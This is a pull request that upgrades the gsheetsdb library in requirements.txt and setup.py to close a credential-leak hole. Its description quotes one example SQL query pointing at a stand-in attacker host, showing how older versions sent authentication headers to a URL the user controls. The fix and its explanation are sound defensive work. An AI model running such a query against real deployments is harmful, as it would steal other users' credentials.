### PR TITLE
Upgrade gsheetsdb

### DIFF
--- a/requirements.txt
+++ b/requirements.txt
@@ -38,7 +38,7 @@ flower==0.9.2
 future==0.16.0            # via pyhive
 geopy==1.11.0
 google-auth==1.6.1        # via gsheetsdb
-gsheetsdb==0.1.8
+gsheetsdb==0.1.9
 gunicorn==19.8.0
 humanize==0.5.1
 idna==2.6

--- a/setup.py
+++ b/setup.py
@@ -67,7 +67,7 @@ setup(
         'flask-wtf',
         'flower',  # deprecated
         'geopy',
-        'gsheetsdb>=0.1.8',
+        'gsheetsdb>=0.1.9',
         'gunicorn',  # deprecated
         'humanize',
         'idna',


### PR DESCRIPTION
The [gshetsdb](https://github.com/betodealmeida/gsheets-db-api) library was upgraded ([0.1.9](https://github.com/betodealmeida/gsheets-db-api/commit/12f2a4fbe1bd5aa36781226759326ce782b08a91)) so that users can connect only to Google Spreadsheets. This prevents users from connecting to a host they control and stealing authentication headers.

For example, in earlier versions users could do:

```sql
SELECT * FROM "http://evilhost.example.com/";
```

And if they control `evilhost.example.com` they would be able to perform a MITM attack or steal credentials.

cc: @mistercrunch 